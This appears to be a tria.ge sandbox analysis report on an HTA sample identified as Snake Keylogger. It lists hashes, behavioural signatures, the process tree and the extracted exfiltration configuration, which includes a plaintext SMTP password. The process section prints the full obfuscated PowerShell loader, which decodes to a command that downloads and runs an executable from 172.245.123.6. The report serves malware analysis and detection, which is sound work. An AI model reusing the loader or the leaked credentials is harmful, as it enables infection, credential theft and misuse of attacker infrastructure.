Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
123s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06/10/2024, 18:45
Static task
static1
Behavioral task
behavioral1
Sample
na.hta
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
na.hta
Resource
win10v2004-20240802-en
General
-
Target
na.hta
-
Size
116KB
-
MD5
bac652fa9a932e3f71411fb993010377
-
SHA1
0dbe1f2b08510b57f0e00189d2355f57e300c47f
-
SHA256
f3761ed191aeddf0e23bba17e361229d81547309dac3b451202df849083b7916
-
SHA512
0ab2913b55e1f60cdb26f003d2c17b492385a43bca2d2c5acb1a659c9a5ed3d232eeceb8b0d4b68ffad11599dab9c27d16d1c990f23e54ea3a8ccd73a4de536f
-
SSDEEP
96:Ea+M73mAWZeuhtAWZDuhogROBHRj/oyYJQAWZSAWZXuhdAWZkAT:Ea+Q3mVkuhtVVuhhRwHxY+VgVFuhdVZT
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/5056-84-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 15 2312 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2312 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 1616 taskhostw.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000800000002348e-69.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1616 set thread context of 5056 1616 taskhostw.exe 91 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2312 powershell.exe 2312 powershell.exe 5056 RegSvcs.exe 5056 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1616 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2312 powershell.exe Token: SeDebugPrivilege 5056 RegSvcs.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 3732 wrote to memory of 1896 3732 mshta.exe 85 PID 3732 wrote to memory of 1896 3732 mshta.exe 85 PID 3732 wrote to memory of 1896 3732 mshta.exe 85 PID 1896 wrote to memory of 2312 1896 cmd.exe 87 PID 1896 wrote to memory of 2312 1896 cmd.exe 87 PID 1896 wrote to memory of 2312 1896 cmd.exe 87 PID 2312 wrote to memory of 468 2312 powershell.exe 88 PID 2312 wrote to memory of 468 2312 powershell.exe 88 PID 2312 wrote to memory of 468 2312 powershell.exe 88 PID 468 wrote to memory of 3948 468 csc.exe 89 PID 468 wrote to memory of 3948 468 csc.exe 89 PID 468 wrote to memory of 3948 468 csc.exe 89 PID 2312 wrote to memory of 1616 2312 powershell.exe 90 PID 2312 wrote to memory of 1616 2312 powershell.exe 90 PID 2312 wrote to memory of 1616 2312 powershell.exe 90 PID 1616 wrote to memory of 5056 1616 taskhostw.exe 91 PID 1616 wrote to memory of 5056 1616 taskhostw.exe 91 PID 1616 wrote to memory of 5056 1616 taskhostw.exe 91 PID 1616 wrote to memory of 5056 1616 taskhostw.exe 91 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\na.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'JGo0Wk9GICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFckRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdsdm1vRndaWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc2tJd2FtLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNoYmNnUUd5c1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxYVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHYWp0R0RieE5qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiblhjTm5QandrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFa21xICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqNFpPRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvMjMwL3Rhc2tob3N0dy5leGUiLCIkZU5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSVC1TTEVlUCgzKTtzdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[CHAr]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'JGo0Wk9GICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFckRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdsdm1vRndaWSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc2tJd2FtLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNoYmNnUUd5c1gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxYVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHYWp0R0RieE5qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiblhjTm5QandrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFa21xICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqNFpPRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvMjMwL3Rhc2tob3N0dy5leGUiLCIkZU5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtzVGFSVC1TTEVlUCgzKTtzdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[CHAr]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkvkbu5g\gkvkbu5g.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4A5.tmp" "c:\Users\Admin\AppData\Local\Temp\gkvkbu5g\CSC7E607820E6A948DD8CD4CB1670F84920.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:3948
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:5056
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD53b3e5951462e3dec15d473cd9f308e52
SHA157512c0cf96f522ea02bff52f6bab381c8ebf323
SHA256f32236e911d3ec698fe98419f4d249010bd117ba15f6cf70a29b1a6b9807d6e4
SHA5124278fcb1e436536b78b8d773aca98cf39befce1f2069aa837e362ebd3e176d72fd61270291498b58ab2be251c244b29110d852a149f068a070530a5418a38cb9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD56b67b5688f49d219931c687ef0d0eca6
SHA121a777229c64bbcbf3e53208f163bddfbfe258f6
SHA25645f9e67f06d318497d32a943508136efd5e8a7dea08af5275636f8ce9e90d2b4
SHA512d267f47b6b5046a94e05f4b1e35527cddf0e62bd012df85496b313f1f285d67083824c9793663cdc28dcd08826e5a49a26660ea7de6b20073a111373c66ea936
-
Filesize
934KB
MD5d515411b9a3c0d9fb13b9c6a928a7fd0
SHA1f940a7302ac76567c15efb1a15d789b42224aac3
SHA2567b2fcffe77e320517c511f5a3700d8545712475aeb4dc04088537fa8456fec77
SHA512447a5ab235672a2d067e5792260aa5b978720f8d67ac80bd875e74d7032cb496e3b0463f3c3870bd87d975cddf7f750df35a9ea7aa8aa65f1bd1590d3305c9d6
-
Filesize
652B
MD5ae1ab6dc39282f6bf8fbc95a10e16b56
SHA102c225ec5ca91c1e294de3d8bbc846c69245fa84
SHA25659d5ddf70399dee8efe834e4e132bbd049fa7e29e26164c52c710897d491c2b4
SHA51236df4f26e6f2ab11e7f2cea8501dbf34d595baf9cd95dbee015ddf81a80e2a1b42ed29028c20c48c3b2e1b5621d600c61854174c54aa0919228f33d2dd33c2ef
-
Filesize
489B
MD566cd8bc31e61e003cddb2ea81c47016a
SHA1b9172635caecd693d1476d08c9cecb5777ea49bb
SHA2560ce2cb15b914d1becfba7f1eed7a96e44610e5b70a8d4a9568ed117d6c3a73dd
SHA5126dd379fff538ecec3814b2bf5ffb2d3e8d1f5e8da9f79b416cd2ac81b916633122565cb9ce89f3bcbb1acb1da0269ae2977fdd515f74f9ffc8dbcae15a0a15e4
-
Filesize
369B
MD5a0c2e8b50719bbb88f2e9f734d9d3406
SHA10760912d408b5e0bc8ce83bf6d447d0c743e1ffa
SHA256e019990be6c4a24d34aeb2c2cf630d86ac65d2b23807d3dece8c877172c8e248
SHA5123f06ee7c97b9f89f11f3eb77f87430b5259faa8303086b95b39b073214a2d453a035a99d773bad46f0bbcd82940528205a9036bd417190298ee45b3b8464a1f6